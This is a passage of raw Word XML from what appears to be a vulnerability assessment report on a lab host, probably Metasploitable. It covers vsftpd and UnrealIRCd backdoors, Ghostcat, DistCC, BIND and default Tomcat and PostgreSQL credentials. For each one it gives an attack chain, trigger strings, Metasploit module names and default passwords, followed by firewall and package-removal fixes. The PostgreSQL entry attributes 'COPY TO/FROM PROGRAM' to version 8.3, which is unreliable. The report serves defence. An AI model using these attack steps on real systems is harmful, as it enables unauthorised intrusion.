        <w:t xml:space="preserve">3.1  CVE-2011-2523  —  CVSS 9.8</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CVE-2011-2523  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 9.8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FTP/vsftpd 2.3.4 (port 21)</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vsftpd 2.3.4 distributed between 30 Jun–3 Jul 2011 contains a backdoor in its source code. Sending a username ending with ':)' triggers a bind shell on TCP/6200 as root, granting unauthenticated root command execution.</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An unauthenticated attacker gains an immediate root shell on the target system with zero interaction required. Full system compromise in under 30 seconds.</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Attacker sends FTP USER with ':)' suffix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">vsftpd opens backdoor bind shell on port 6200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker connects to port 6200 — receives root shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker installs persistence (SSH keys, cron)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Lateral movement across network from root context</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Remove vsftpd 2.3.4 immediately. Install a verified clean package: apt-get remove vsftpd &amp;&amp; apt-get install vsftpd (verify SHA256 checksum). Block port 21 via firewall if FTP is not operationally required.</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apt-get remove --purge vsftpd -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get install vsftpd -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 21/tcp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl disable vsftpd</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3.2  CVE-2010-2075  —  CVSS 9.8</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CVE-2010-2075  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 9.8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IRC/UnrealIRCd 3.2.8.1 (ports 6667, 6697)</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UnrealIRCd 3.2.8.1 (distributed Nov 2009 – Jun 2010) contains a backdoor injected during distribution. Sending 'AB' as the first two bytes of any IRC message executes arbitrary system commands as the UnrealIRCd process user.</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Instant remote code execution as the daemon user (often root). The MSF module exploit/unix/irc/unreal_ircd_3281_backdoor delivers a shell in seconds. No authentication required.</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Send 'AB&lt;cmd&gt;' to port 6667 or 6697</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">UnrealIRCd executes command as daemon user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker receives reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalate privileges via local kernel exploits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Exfiltrate credentials, install C2 implant</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Remove UnrealIRCd immediately. Verify binaries with checksums before any reinstall. Block IRC ports.</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systemctl stop unrealircd 2&gt;/dev/null; pkill -f unrealircd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get remove --purge unrealircd -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 6667/tcp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 6697/tcp</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3.3  CVE-2020-1938  —  CVSS 9.8</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CVE-2020-1938  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 9.8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AJP/Apache Tomcat (port 8009)</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Ghostcat: The Apache AJP connector (enabled by default on port 8009) allows unauthenticated reading of any file within the Tomcat webapp root directory. If file upload is possible, it can also be used to achieve remote code execution.</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An attacker can read application source code, configuration files with credentials, and potentially execute code by uploading a JSP shell through another vulnerability.</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Connect to AJP port 8009 (no auth needed)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Read /WEB-INF/web.xml — extract DB credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Use credentials to access backend database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload JSP webshell via Tomcat manager (default creds)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Achieve OS-level RCE → full system compromise</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Disable the AJP connector in server.xml, or add requiredSecret and bind to localhost. Upgrade Apache Tomcat to a patched version.</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sed -i 's/&lt;Connector port="8009".*\/&gt;/&lt;!-- AJP disabled --&gt;/' /etc/tomcat*/server.xml</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl restart tomcat*</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 8009/tcp</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3.4  CVE-2008-0122  —  CVSS 10</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CVE-2008-0122  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 10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DNS/ISC BIND 9.4.2 (port 53)</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Off-by-one error in the inet_network() function in ISC BIND 9.4.2 allows remote attackers to cause a denial of service or potentially execute arbitrary code via a crafted IP address string.</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 remote attacker can crash or potentially take over the DNS server, enabling DNS hijacking, cache poisoning, or full system compromise.</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Send malformed IP address to BIND 9.4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Trigger buffer overflow in inet_network()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Achieve arbitrary code execution as named user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Hijack DNS responses across the network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Redirect all traffic to attacker-controlled infrastructure</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Upgrade BIND to a supported version. Restrict DNS to internal use only. Enable Response Rate Limiting (RRL).</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apt-get remove --purge bind9 -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get install bind9 -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw allow from 192.168.64.0/24 to any port 53</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 53/tcp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 53/udp</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3.5  CVE-2004-2687  —  CVSS 9.3</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CVE-2004-2687  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 9.3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DistCC daemon (port 3632)</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The DistCC distributed compiler daemon does not properly restrict access and allows remote attackers to execute arbitrary commands via compilation jobs, effectively providing unauthenticated RCE as the daemon user.</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Any host that can reach port 3632 can execute OS commands as the distcc user. The MSF module exploit/unix/misc/distcc_exec is reliable and fast.</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Send crafted compilation job to distccd on 3632</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">DistCC executes attacker-supplied commands as daemon user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker receives bash reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Leverage writable directories for local privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish persistence via cron or SSH keys</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Disable and remove DistCC. If required, restrict it to trusted build hosts via --allow flags and firewall rules.</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systemctl stop distcc; systemctl disable distcc</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get remove distcc -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 3632/tcp</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3.6  CVE-2009-3843  —  CVSS 9</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CVE-2009-3843  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 9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Apache Tomcat 5.5 (port 8180)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Apache Tomcat 5.5 ships with default credentials (tomcat/tomcat) in tomcat-users.xml. The Tomcat Manager web application allows deployment of arbitrary WAR files, providing direct remote code execution on the server.</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Any attacker who can reach port 8180 can deploy a JSP webshell via the Tomcat Manager and achieve OS-level remote code execution as the Tomcat process user.</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Browse to http://192.168.64.2:8180/manager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Login with default credentials: tomcat/tomcat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload malicious WAR file containing JSP shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Access deployed shell via browser</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute OS commands — pivot to root via local exploits</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Change Tomcat manager credentials immediately. Restrict manager access to localhost only. Upgrade Tomcat to a supported version.</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 Edit /etc/tomcat*/tomcat-users.xml — set strong password</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Restrict manager in context.xml:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># &lt;Valve className='org.apache.catalina.valves.RemoteAddrValve' allow='127\..*'/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get upgrade tomcat* -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl restart tomcat*</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3.7  CVE-2007-3278  —  CVSS 9</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CVE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7226"/>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20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2007-3278  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 9  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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Affected Service</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PostgreSQL 8.3 (port 5432)</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PostgreSQL 8.3.0–8.3.7 is accessible with default credentials (postgres/postgres) and has remote access enabled. An attacker can use the COPY TO/FROM PROGRAM functionality to execute OS commands.</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Unauthenticated database access with default credentials allows data exfiltration, OS command execution via SQL, and privilege escalation to postgres OS user.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
